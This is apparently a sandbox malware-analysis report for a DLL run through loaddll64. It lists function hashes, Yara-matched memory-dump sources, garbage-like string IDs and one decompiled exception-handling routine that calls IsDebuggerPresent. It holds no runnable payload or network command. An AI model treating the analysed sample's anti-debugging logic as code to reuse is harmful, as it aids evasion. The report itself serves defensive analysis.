                                                                                                      • Opcode ID: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
                                                                                                      • Instruction ID: 4935dbd788b276db2f5fe8ed1a392a7bc781db769ad7bdf0ca6a3b91ee0e9afe
                                                                                                      • Opcode Fuzzy Hash: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
                                                                                                      • Instruction Fuzzy Hash: DED09E67939A8181D644FB12F89115AA760FBC97C0F905435FA9E43B2AEF2CC1D14B00
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateMessageRegisterTouch
                                                                                                      • String ID: Cannot register application window for multi-touch input$Error
                                                                                                      • API String ID: 490141109-480840240
                                                                                                      • Opcode ID: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
                                                                                                      • Instruction ID: 973a630e2093a47b28c8d2de34e75b6783658ef425706529ece25061529dcb26
                                                                                                      • Opcode Fuzzy Hash: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
                                                                                                      • Instruction Fuzzy Hash: C851F83692CB4686E750CF15E88436A73A0FB86BE4F504536DA8E477A8DF3CE085C760
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %wk$@$Hp$KI@l$]I$^e?u$~JO$K
                                                                                                      • API String ID: 0-1942796489
                                                                                                      • Opcode ID: 0db96a3033a52dec7f41ba08dcaea74adbed8d76393b2956a65234561adab349
                                                                                                      • Instruction ID: e1c3b1e3eb44e9ced759bc87f3cac7b1a040f97d798b52c0718f9fedf429efa7
                                                                                                      • Opcode Fuzzy Hash: 0db96a3033a52dec7f41ba08dcaea74adbed8d76393b2956a65234561adab349
                                                                                                      • Instruction Fuzzy Hash: 71A2F871504B8C8FEB59CF28C88A59E7BE2FB84744F20461DF96A872A0D774D945CF82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: k$7'$D$G($Z<$o7=/$y
                                                                                                      • API String ID: 0-1865188920
                                                                                                      • Opcode ID: d517ad9a530fb802bb13479e859ccf9692cae92b90ad32258a35f0c9934de413
                                                                                                      • Instruction ID: fda8176045f72ddac869dc68b56e77e08c564191d5b4e17a01401cd0e62d40de
                                                                                                      • Opcode Fuzzy Hash: d517ad9a530fb802bb13479e859ccf9692cae92b90ad32258a35f0c9934de413
                                                                                                      • Instruction Fuzzy Hash: 2032E17150C7848FD798CFA9C58A65BFBE1FB88744F108A1DF486862A0D7F8D949CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 65%
                                                                                                      			E00007FF87FF87C109474(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                                                                                                      				void* __rdi;
                                                                                                      				void* _t36;
                                                                                                      				int _t40;
                                                                                                      				void* _t45;
                                                                                                      				intOrPtr _t53;
                                                                                                      				signed long long _t63;
                                                                                                      				long long _t66;
                                                                                                      				_Unknown_base(*)()* _t86;
                                                                                                      				void* _t90;
                                                                                                      				void* _t91;
                                                                                                      				void* _t93;
                                                                                                      				signed long long _t94;
                                                                                                      				struct _EXCEPTION_POINTERS* _t100;
                                                                                                      
                                                                                                      				_t46 = __ecx;
                                                                                                      				 *((long long*)(_t93 + 0x10)) = __rbx;
                                                                                                      				 *((long long*)(_t93 + 0x18)) = __rsi;
                                                                                                      				_t91 = _t93 - 0x4f0;
                                                                                                      				_t94 = _t93 - 0x5f0;
                                                                                                      				_t63 =  *0x7c17e008; // 0xb442f0549439
                                                                                                      				 *(_t91 + 0x4e0) = _t63 ^ _t94;
                                                                                                      				_t53 = r8d;
                                                                                                      				_t45 = __ecx;
                                                                                                      				if (__ecx == 0xffffffff) goto 0x7c1094b3;
                                                                                                      				E00007FF87FF87C10493C(_t36);
                                                                                                      				r8d = 0x98;
                                                                                                      				E00007FF87FF87C106920(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
                                                                                                      				r8d = 0x4d0;
                                                                                                      				E00007FF87FF87C106920(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
                                                                                                      				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
                                                                                                      				_t66 = _t91 + 0x10;
                                                                                                      				 *((long long*)(_t94 + 0x50)) = _t66;
                                                                                                      				__imp__RtlCaptureContext();
                                                                                                      				r8d = 0;
                                                                                                      				__imp__RtlLookupFunctionEntry();
                                                                                                      				if (_t66 == 0) goto 0x7c109546;
                                                                                                      				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
                                                                                                      				 *((long long*)(_t94 + 0x30)) = _t94 + 0x58;
                                                                                                      				 *((long long*)(_t94 + 0x28)) = _t94 + 0x60;
                                                                                                      				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
                                                                                                      				__imp__RtlVirtualUnwind();
                                                                                                      				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
                                                                                                      				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
                                                                                                      				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
                                                                                                      				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
                                                                                                      				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
                                                                                                      				_t40 = IsDebuggerPresent();
                                                                                                      				SetUnhandledExceptionFilter(_t86, _t90);
                                                                                                      				if (UnhandledExceptionFilter(_t100) != 0) goto 0x7c1095a8;
                                                                                                      				if (_t40 != 0) goto 0x7c1095a8;
                                                                                                      				if (_t45 == 0xffffffff) goto 0x7c1095a8;
                                                                                                      				return E00007FF87FF87C103A70(E00007FF87FF87C10493C(_t42), _t45, 0,  *(_t91 + 0x4e0) ^ _t94);
                                                                                                      			}
















                                                                                                      0x7ff87c109474
                                                                                                      0x7ff87c109474
                                                                                                      0x7ff87c109479
                                                                                                      0x7ff87c109482
                                                                                                      0x7ff87c10948a
                                                                                                      0x7ff87c109491
                                                                                                      0x7ff87c10949b
                                                                                                      0x7ff87c1094a2
                                                                                                      0x7ff87c1094a7
                                                                                                      0x7ff87c1094ac
                                                                                                      0x7ff87c1094ae
                                                                                                      0x7ff87c1094ba
                                                                                                      0x7ff87c1094c0
                                                                                                      0x7ff87c1094cb
                                                                                                      0x7ff87c1094d1
                                                                                                      0x7ff87c1094db
                                                                                                      0x7ff87c1094e4
                                                                                                      0x7ff87c1094e8
                                                                                                      0x7ff87c1094ed
                                                                                                      0x7ff87c109502
                                                                                                      0x7ff87c109505
                                                                                                      0x7ff87c10950e
                                                                                                      0x7ff87c109510
                                                                                                      0x7ff87c109523
                                                                                                      0x7ff87c109530
                                                                                                      0x7ff87c109539
                                                                                                      0x7ff87c109540
                                                                                                      0x7ff87c10954d
                                                                                                      0x7ff87c10955f
                                                                                                      0x7ff87c109563
                                                                                                      0x7ff87c109571
                                                                                                      0x7ff87c109575
                                                                                                      0x7ff87c109579
                                                                                                      0x7ff87c109583
                                                                                                      0x7ff87c109596
                                                                                                      0x7ff87c10959a
                                                                                                      0x7ff87c10959f
                                                                                                      0x7ff87c1095ce

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
                                                                                                      • Instruction ID: e1f21ebf9096729ff0fc362a45f6d759f9d36cd637a806aa56c9c563d74c80cf
                                                                                                      • Opcode Fuzzy Hash: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
                                                                                                      • Instruction Fuzzy Hash: A8314137628F8186E760CF25E8503AE73A4FB8A798F544136EA9D43B94DF3CD5858B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: >#3$??$Aw$F$J
                                                                                                      • API String ID: 0-2784440385
                                                                                                      • Opcode ID: 9b37fcd8b9b3a2236a01d1c259a381c152bbfd2ce75b9ee2bc70d5e09618c5cf
                                                                                                      • Instruction ID: 9fdd82093245732d6ff01b86e1d36ab714c40b68dc6afb612ae034bafb5e4a55
                                                                                                      • Opcode Fuzzy Hash: 9b37fcd8b9b3a2236a01d1c259a381c152bbfd2ce75b9ee2bc70d5e09618c5cf
                                                                                                      • Instruction Fuzzy Hash: C9924F7054838B8FDB78CF24C845BEE7BE1FB84304F10452DE8698A761E7749A49DB82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$9`^p$>S1$@K$<
                                                                                                      • API String ID: 0-904861090
                                                                                                      • Opcode ID: 7e13130689c942aa12df05012069a4264cc12f2cb0cc79f599492960cab10520
                                                                                                      • Instruction ID: d0ca11fee3017775904e89b4535bcf8825016c76ce67da6f48249d0445d1abfd
                                                                                                      • Opcode Fuzzy Hash: 7e13130689c942aa12df05012069a4264cc12f2cb0cc79f599492960cab10520
                                                                                                      • Instruction Fuzzy Hash: BC12E37150078CDBDBACCF68C88A6DD3FB1FB443A4F605219F942962A0D7B5D989CB81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "4$f_$fzT$$
                                                                                                      • API String ID: 0-2251851231
                                                                                                      • Opcode ID: 22d9a0b68b50d0ea5fd6d1aeab0a3e2fc9a27e070a6cf0ea182e7b607f92900b
                                                                                                      • Instruction ID: 00078a186b7d7b6ae4f12e3c11a5bc13b18b9b2cdced29765063d95cb29d2c11
                                                                                                      • Opcode Fuzzy Hash: 22d9a0b68b50d0ea5fd6d1aeab0a3e2fc9a27e070a6cf0ea182e7b607f92900b
                                                                                                      • Instruction Fuzzy Hash: 42B123B090470A8FDB48DFA8C48A5EEBBF0FB48358F15461DE806A7290D774AA45CFC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CX$[n$\$eI$E$8
                                                                                                      • API String ID: 0-2019653245
                                                                                                      • Opcode ID: b58e03c4429f51dfff5bc7e79067d6589c1b082eef975631b4c3cbf620760393
                                                                                                      • Instruction ID: b0bde2b46dd9974091b147c1be75073ae13835eaf58c76366964caef907b3f92
                                                                                                      • Opcode Fuzzy Hash: b58e03c4429f51dfff5bc7e79067d6589c1b082eef975631b4c3cbf620760393
                                                                                                      • Instruction Fuzzy Hash: 4E318EB190074E8FDB44CF64C48A5CE7FB0FB68798F204618E859A6250D3B896A4CBD5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $ $$$|nV
                                                                                                      • API String ID: 0-3281042611
                                                                                                      • Opcode ID: a7c4594aceaea0e8dab67c6b4234a17b84941429c25f26251dab7e9d55dda18c
                                                                                                      • Instruction ID: 0fceca5626e055d2fbf750ad096c81a0ae15a929736b2a3d881e47323bd06dff
                                                                                                      • Opcode Fuzzy Hash: a7c4594aceaea0e8dab67c6b4234a17b84941429c25f26251dab7e9d55dda18c
                                                                                                      • Instruction Fuzzy Hash: DA72FA71A0474C8BDF58CFA8C04AADDBBF5FB54344F00412DED4AAB298D7B4A91ACB45
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: R7i$VG$]>S$u`
                                                                                                      • API String ID: 0-1600827667
                                                                                                      • Opcode ID: 32acbc697c5eb7ce2dca7a46b63a12961e990b109133ed3221841dcaa14a51a8
                                                                                                      • Instruction ID: e69c950c419dafbc2894b984fb63416e0ad2d3a581be44541dc433b6a47a3fb9
                                                                                                      • Opcode Fuzzy Hash: 32acbc697c5eb7ce2dca7a46b63a12961e990b109133ed3221841dcaa14a51a8
                                                                                                      • Instruction Fuzzy Hash: DC32F1709097C88BDBF8DF24C8897DD7BE0FF48344F50515A984E9A694CBB86689CF42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: BB$z<$.$4
                                                                                                      • API String ID: 0-1591233792
                                                                                                      • Opcode ID: aa7d0a4ee19aefbaa19c8d8e8495d0b927018643d7d53871069b311c10225edc
                                                                                                      • Instruction ID: f44964999cc3d50e9f587f9f9c8efa5a6e46c46b2493dcde8a40a3edfa6d90f8
                                                                                                      • Opcode Fuzzy Hash: aa7d0a4ee19aefbaa19c8d8e8495d0b927018643d7d53871069b311c10225edc
                                                                                                      • Instruction Fuzzy Hash: 3302047190474DCBDF6CDF68C88A6EE7BB0FF48344F00421DEA46A6290D77A9949CB84
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Jx$M[$jP$xy
                                                                                                      • API String ID: 0-882801676
                                                                                                      • Opcode ID: a27b4655e249ce8e00af1ad73db02211fa2bbf7353868e6a6b849cd1b884cbbc
                                                                                                      • Instruction ID: 58f3606e86ff435d226b8bd8aedcb6a7b303468577bfe9f696ea944d9a70988a
                                                                                                      • Opcode Fuzzy Hash: a27b4655e249ce8e00af1ad73db02211fa2bbf7353868e6a6b849cd1b884cbbc
                                                                                                      • Instruction Fuzzy Hash: DBC1087090475CCBDF59DF68D8896DDBBB0FB48308F118219F89AAB2A1CB789905CF45
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: &$@2$Jn$^
                                                                                                      • API String ID: 0-1816242221
                                                                                                      • Opcode ID: 569fa3d4bf83859d4808d779e504945ae089fbdc48947470bf052a87739f6000
                                                                                                      • Instruction ID: b42d7ccd07b59f248f07516313cf01464c8448466868081e17338bda4afdc4d1
                                                                                                      • Opcode Fuzzy Hash: 569fa3d4bf83859d4808d779e504945ae089fbdc48947470bf052a87739f6000
                                                                                                      • Instruction Fuzzy Hash: 95910470D0471A8BEF98DFA8D48A6EEBBF0FB48344F108119E515B6290D7789A48CF95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0e$64$@$o=
                                                                                                      • API String ID: 0-3194635012
                                                                                                      • Opcode ID: 2a7eec621bc3736d8bcf3cd4502b1118f0a5049720cbc299d1d867f1de7ce1b9
                                                                                                      • Instruction ID: 43be15bbb58683b0ec8bcd6d9d0e20e10858889a9d955228704270f701235499
                                                                                                      • Opcode Fuzzy Hash: 2a7eec621bc3736d8bcf3cd4502b1118f0a5049720cbc299d1d867f1de7ce1b9
                                                                                                      • Instruction Fuzzy Hash: 3B91E47051068C9FDB89DF24D88AADD3BB0FF58348F815319FC8AA6290C778D589CB49
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;$36H$Yfr4$kWa^
                                                                                                      • API String ID: 0-3599472112
                                                                                                      • Opcode ID: 05a798feef6af16b9893fff0148a6d85916b1b1ef146ddbd548bcf6645ccff48
                                                                                                      • Instruction ID: 61779539911d561746882ab877a6c74db6c2f424096ebd80c4a9c7726920f4e4
                                                                                                      • Opcode Fuzzy Hash: 05a798feef6af16b9893fff0148a6d85916b1b1ef146ddbd548bcf6645ccff48
                                                                                                      • Instruction Fuzzy Hash: 1B41A0B090034E8FDF48CF24C9865DE7FB0FB68394F214619E85AA6250D77896A5CBC4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ?M$B $bN$u
                                                                                                      • API String ID: 0-4267052880
                                                                                                      • Opcode ID: c9a15cb732fd24f5d33c0626e266d07e83fb093bffd41cbb69e3c4f465881b9b
                                                                                                      • Instruction ID: 4c93545f67a4f45fbff1f0d508ee645a9c55300ad5c75e3690df59447bdefe11
                                                                                                      • Opcode Fuzzy Hash: c9a15cb732fd24f5d33c0626e266d07e83fb093bffd41cbb69e3c4f465881b9b
                                                                                                      • Instruction Fuzzy Hash: 0F3119715187808FD76CCF28C19A25FBBF1BBC6704F50891CF68A8A390D7B69908CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ($U$wU
                                                                                                      • API String ID: 0-2031152664
                                                                                                      • Opcode ID: d030330acb421e585ce2b574953e0510a66a350c77e1366bf0b1b6b086404ac8
                                                                                                      • Instruction ID: 63807de6178b1657ad1a902dfd73c136082737fd32258a2b89e90bae0d465738
                                                                                                      • Opcode Fuzzy Hash: d030330acb421e585ce2b574953e0510a66a350c77e1366bf0b1b6b086404ac8
                                                                                                      • Instruction Fuzzy Hash: 4E42C5719097C88BDBF9DE24C8893DD7BF0FF48344F50515A984E9A694CBB86688CF42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: y$!d.#$U
                                                                                                      • API String ID: 0-1702114524
                                                                                                      • Opcode ID: 061c74f3ba4e2152ff7bfc3bb03a690cfa0dcda01d33ce28c375482b364cb02f
                                                                                                      • Instruction ID: 4b2da67fef5f64081cc442b482ab5a3168f7e247fbdeb14fd0ac8dc0810a9ec3
                                                                                                      • Opcode Fuzzy Hash: 061c74f3ba4e2152ff7bfc3bb03a690cfa0dcda01d33ce28c375482b364cb02f
                                                                                                      • Instruction Fuzzy Hash: 7702B371504AC88BDBBDDF24CC897EF7BA1FB44346F10561AD88A9A290DBB45785CF01
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: =1Z$h^$h
                                                                                                      • API String ID: 0-2636329743
                                                                                                      • Opcode ID: 36181cb170d6f76158f3dc770eb623a7b3ca10ea6b51aaa1b83d78e1cc7645e9
                                                                                                      • Instruction ID: b01e88b6b57ba4d7dccfa73d8ad07d3cee0fb8b291d2e61316bf3d6cb9ca5404
                                                                                                      • Opcode Fuzzy Hash: 36181cb170d6f76158f3dc770eb623a7b3ca10ea6b51aaa1b83d78e1cc7645e9
                                                                                                      • Instruction Fuzzy Hash: 42E1D9705087C8CBEBBECF64C8897DA7BA8FB44708F10561DE94A9E258DB745749CB01
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: V$bVZ$o(
                                                                                                      • API String ID: 0-1660054416
                                                                                                      • Opcode ID: c573c94778afb4164dd1f31be71a66e0f46c26de5815c84ea55065cf2efd2382
                                                                                                      • Instruction ID: 7ef0dff0314bf7e4e26ddc1ed0add8f6d506e2d18b76783c6c5e1c9ab995db20
                                                                                                      • Opcode Fuzzy Hash: c573c94778afb4164dd1f31be71a66e0f46c26de5815c84ea55065cf2efd2382
                                                                                                      • Instruction Fuzzy Hash: 62C1297050074E8FDF89DF24C88AADE3BA1FB58398F114219FC4AA62A0D778D595CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: #X$$&]$m%K
                                                                                                      • API String ID: 0-1065608980
                                                                                                      • Opcode ID: 7c1237e4964242170fe6cd8b4d96af821d7603f8e1f845348ad2ac7cd3c31af6
                                                                                                      • Instruction ID: 281ae2356dc6a3955f278cfb62bb8b0cbfc4af089bf5b994b6edc0547db548b7
                                                                                                      • Opcode Fuzzy Hash: 7c1237e4964242170fe6cd8b4d96af821d7603f8e1f845348ad2ac7cd3c31af6
                                                                                                      • Instruction Fuzzy Hash: 48C179B1A0460DCFDB68DF78D15A5DD7BF1BB48308F206129F8269A2A2E374A509CF54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: K#$LI$cn
                                                                                                      • API String ID: 0-3773415493
                                                                                                      • Opcode ID: 959f25c4968512607ae0cca543834cbc84a398ae39e464127cc603f4c4925a13
                                                                                                      • Instruction ID: af7bcaa4455c986dbcfdcb56c81b34c69ff90ba63cace1699fbe1714427d0302
